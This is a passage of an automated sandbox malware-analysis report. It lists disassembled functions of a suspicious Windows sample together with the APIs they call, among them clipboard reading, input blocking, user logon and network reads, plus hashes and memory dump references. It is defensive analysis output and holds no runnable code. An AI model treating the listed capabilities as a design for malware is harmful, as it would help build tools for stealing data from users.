                                                                                                • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                • IsWindowVisible.USER32 ref: 0047A368
                                                                                                • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                • IsIconic.USER32 ref: 0047A393
                                                                                                • IsZoomed.USER32 ref: 0047A3A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                • String ID:
                                                                                                • API String ID: 292994002-0
                                                                                                • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                • CoUninitialize.OLE32 ref: 0047863C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                • String ID: .lnk
                                                                                                • API String ID: 886957087-24824748
                                                                                                • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                • CloseClipboard.USER32 ref: 0046DD41
                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                • CloseClipboard.USER32 ref: 0046DD99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                • String ID:
                                                                                                • API String ID: 15083398-0
                                                                                                • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 3541575487-0
                                                                                                • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                • String ID:
                                                                                                • API String ID: 48322524-0
                                                                                                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                • String ID:
                                                                                                • API String ID: 901099227-0
                                                                                                • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Proc
                                                                                                • String ID:
                                                                                                • API String ID: 2346855178-0
                                                                                                • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: BlockInput
                                                                                                • String ID:
                                                                                                • API String ID: 3456056419-0
                                                                                                • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: LogonUser
                                                                                                • String ID:
                                                                                                • API String ID: 1244722697-0
                                                                                                • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameUser
                                                                                                • String ID:
                                                                                                • API String ID: 2645101109-0
                                                                                                • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: N@
                                                                                                • API String ID: 0-1509896676
                                                                                                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
